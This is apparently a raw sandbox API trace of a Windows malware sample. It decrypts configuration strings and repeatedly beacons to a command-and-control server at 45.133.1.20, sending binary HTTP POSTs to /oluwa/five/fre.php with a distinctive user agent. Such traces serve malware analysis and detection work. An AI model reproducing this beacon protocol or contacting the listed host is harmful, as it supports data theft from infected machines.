pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0259.809] GetProcessHeap () returned 0x6a0000 [0259.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0259.810] GetProcessHeap () returned 0x6a0000 [0259.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.811] GetProcessHeap () returned 0x6a0000 [0259.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0259.811] GetProcessHeap () returned 0x6a0000 [0259.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0259.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0259.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.850] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0259.861] GetProcessHeap () returned 0x6a0000 [0259.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0259.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.862] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0259.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.863] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0259.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.865] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.865] GetProcessHeap () returned 0x6a0000 [0259.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0259.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.867] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0259.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.868] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0259.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0259.871] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0259.871] GetProcessHeap () returned 0x6a0000 [0259.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0259.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.872] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0259.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.873] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0259.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.874] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0259.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0259.875] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0259.875] GetProcessHeap () returned 0x6a0000 [0259.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0259.875] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0259.875] GetProcessHeap () returned 0x6a0000 [0259.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0259.875] socket (af=2, type=1, protocol=6) returned 0x8d4 [0259.877] connect (s=0x8d4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0259.904] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0259.904] GetProcessHeap () returned 0x6a0000 [0259.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0259.904] GetProcessHeap () returned 0x6a0000 [0259.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0259.905] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.906] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0259.906] GetProcessHeap () returned 0x6a0000 [0259.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dcd58 [0259.907] GetProcessHeap () returned 0x6a0000 [0259.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.907] GetProcessHeap () returned 0x6a0000 [0259.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0259.907] GetProcessHeap () returned 0x6a0000 [0259.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0259.908] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0259.909] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0259.909] GetProcessHeap () returned 0x6a0000 [0259.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0259.909] GetProcessHeap () returned 0x6a0000 [0259.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0259.910] send (s=0x8d4, buf=0x6bd460*, len=242, flags=0) returned 242 [0259.911] send (s=0x8d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0259.911] GetProcessHeap () returned 0x6a0000 [0259.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0259.911] recv (in: s=0x8d4, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0259.984] GetProcessHeap () returned 0x6a0000 [0259.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0259.985] GetProcessHeap () returned 0x6a0000 [0259.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0259.985] GetProcessHeap () returned 0x6a0000 [0259.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcd58 | out: hHeap=0x6a0000) returned 1 [0259.987] GetProcessHeap () returned 0x6a0000 [0259.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0259.988] closesocket (s=0x8d4) returned 0 [0259.989] GetProcessHeap () returned 0x6a0000 [0259.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0259.989] GetProcessHeap () returned 0x6a0000 [0259.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0259.990] GetProcessHeap () returned 0x6a0000 [0259.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0259.990] GetProcessHeap () returned 0x6a0000 [0259.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0259.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1618) returned 0x8d4 [0260.002] Sleep (dwMilliseconds=0xea60) [0260.004] GetProcessHeap () returned 0x6a0000 [0260.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0260.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.005] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.011] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0260.028] GetProcessHeap () returned 0x6a0000 [0260.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0260.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.029] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0260.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.030] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.031] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.031] GetProcessHeap () returned 0x6a0000 [0260.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0260.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.032] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0260.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.034] CryptDestroyKey (hKey=0x6ad020) returned 1 [0260.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.034] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0260.034] GetProcessHeap () returned 0x6a0000 [0260.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.038] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.039] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.040] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.041] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.041] GetProcessHeap () returned 0x6a0000 [0260.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0260.041] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.041] GetProcessHeap () returned 0x6a0000 [0260.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0260.042] GetProcessHeap () returned 0x6a0000 [0260.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.042] GetProcessHeap () returned 0x6a0000 [0260.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0260.042] GetProcessHeap () returned 0x6a0000 [0260.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0260.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.043] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0260.123] GetProcessHeap () returned 0x6a0000 [0260.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0260.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.125] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0260.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.126] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.128] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.128] GetProcessHeap () returned 0x6a0000 [0260.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0260.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.130] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0260.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.131] CryptDestroyKey (hKey=0x6ad020) returned 1 [0260.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.132] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0260.132] GetProcessHeap () returned 0x6a0000 [0260.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.137] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0260.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.138] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0260.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.139] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0260.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.141] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0260.141] GetProcessHeap () returned 0x6a0000 [0260.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0260.141] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0260.141] GetProcessHeap () returned 0x6a0000 [0260.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0260.141] socket (af=2, type=1, protocol=6) returned 0x8d8 [0260.141] connect (s=0x8d8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0260.189] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0260.189] GetProcessHeap () returned 0x6a0000 [0260.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0260.189] GetProcessHeap () returned 0x6a0000 [0260.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0260.190] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.191] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.191] GetProcessHeap () returned 0x6a0000 [0260.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dce18 [0260.191] GetProcessHeap () returned 0x6a0000 [0260.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0260.192] GetProcessHeap () returned 0x6a0000 [0260.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0260.192] GetProcessHeap () returned 0x6a0000 [0260.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0260.192] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0260.193] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.193] GetProcessHeap () returned 0x6a0000 [0260.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0260.193] GetProcessHeap () returned 0x6a0000 [0260.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0260.194] send (s=0x8d8, buf=0x6bd460*, len=242, flags=0) returned 242 [0260.194] send (s=0x8d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0260.194] GetProcessHeap () returned 0x6a0000 [0260.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0260.195] recv (in: s=0x8d8, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0260.275] GetProcessHeap () returned 0x6a0000 [0260.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0260.278] GetProcessHeap () returned 0x6a0000 [0260.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0260.279] GetProcessHeap () returned 0x6a0000 [0260.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dce18 | out: hHeap=0x6a0000) returned 1 [0260.279] GetProcessHeap () returned 0x6a0000 [0260.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0260.280] closesocket (s=0x8d8) returned 0 [0260.281] GetProcessHeap () returned 0x6a0000 [0260.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0260.281] GetProcessHeap () returned 0x6a0000 [0260.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.282] GetProcessHeap () returned 0x6a0000 [0260.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0260.282] GetProcessHeap () returned 0x6a0000 [0260.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0260.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x161c) returned 0x8d8 [0260.286] Sleep (dwMilliseconds=0xea60) [0260.290] GetProcessHeap () returned 0x6a0000 [0260.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0260.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0260.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.298] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0260.307] GetProcessHeap () returned 0x6a0000 [0260.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0260.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.308] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0260.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.309] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.310] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.310] GetProcessHeap () returned 0x6a0000 [0260.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0260.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.311] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0260.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.312] CryptDestroyKey (hKey=0x6ad520) returned 1 [0260.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0260.314] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0260.314] GetProcessHeap () returned 0x6a0000 [0260.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0260.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.315] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.316] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.320] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0260.321] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.321] GetProcessHeap () returned 0x6a0000 [0260.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0260.321] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0260.321] GetProcessHeap () returned 0x6a0000 [0260.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0260.322] GetProcessHeap () returned 0x6a0000 [0260.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0260.322] GetProcessHeap () returned 0x6a0000 [0260.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0260.323] GetProcessHeap () returned 0x6a0000 [0260.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0260.323] 